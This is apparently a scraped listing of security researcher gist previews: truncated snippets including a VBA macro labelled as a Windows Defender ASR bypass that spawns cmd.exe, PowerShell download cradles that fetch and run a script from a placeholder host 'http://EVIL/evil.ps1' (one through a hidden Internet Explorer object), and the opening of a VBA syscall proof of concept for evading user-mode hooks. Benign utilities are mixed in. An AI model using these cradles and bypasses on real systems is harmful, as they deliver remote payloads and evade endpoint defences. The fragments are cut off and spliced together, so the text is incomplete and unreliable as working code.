Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
' ASR rules bypass creating child processes | |
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
Sub ASR_blocked() | |
Dim WSHShell As Object | |
Set WSHShell = CreateObject("Wscript.Shell") | |
WSHShell.Run "cmd.exe" | |
End Sub |
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { | |
Write-Warning "This script will not function with administrative privileges. Please run as a normal user." | |
Break | |
} | |
$outfile = "acltestfile" | |
set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";") | |
Foreach ($path in $paths) { | |
# This prints a table of ACLs | |
# get-acl $path | %{ $_.Access } | ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights |
filter Get-AppPackageTriageInfo { | |
<# | |
.SYNOPSIS | |
A tool to perform rapid triage of decompressed application packages (.msix and .appx files). | |
.DESCRIPTION | |
Get-AppPackageTriageInfo parses key information from an uncompressed application package (.msix and .appx) without needing to first install it. |
#def _tokenize(code, comments, comment_strings, containers): | |
# """ | |
# tokenizes sources code to find hardcoded strings | |
# returns list of hardcoded strings | |
# """ | |
# string = container = comment_end = '' | |
# state = 'look' | |
# skip = 0 | |
# comment = False | |
# all_strings = [] |
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
from __future__ import print_function | |
import os | |
import sys | |
try: | |
import olefile |
#!/usr/bin/env python | |
import os | |
import shlex | |
import struct | |
import platform | |
import subprocess | |
def get_terminal_size(): | |
""" getTerminalSize() |
def crc16(data: bytes, poly=0x8408): | |
''' | |
CRC-16-CCITT Algorithm | |
''' | |
data = bytearray(data) | |
crc = 0xFFFF | |
for b in data: | |
cur_byte = 0xFF & b | |
for _ in range(0, 8): | |
if (crc & 0x0001) ^ (cur_byte & 0x0001): |
' Proof of Concept: retrieving SSN for syscalling in VBA | |
' Author: Juan Manuel Fernandez (@TheXC3LL) | |
'Based on: | |
'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/ | |
'https://www.crummie5.club/freshycalls/ | |
Private Type LARGE_INTEGER |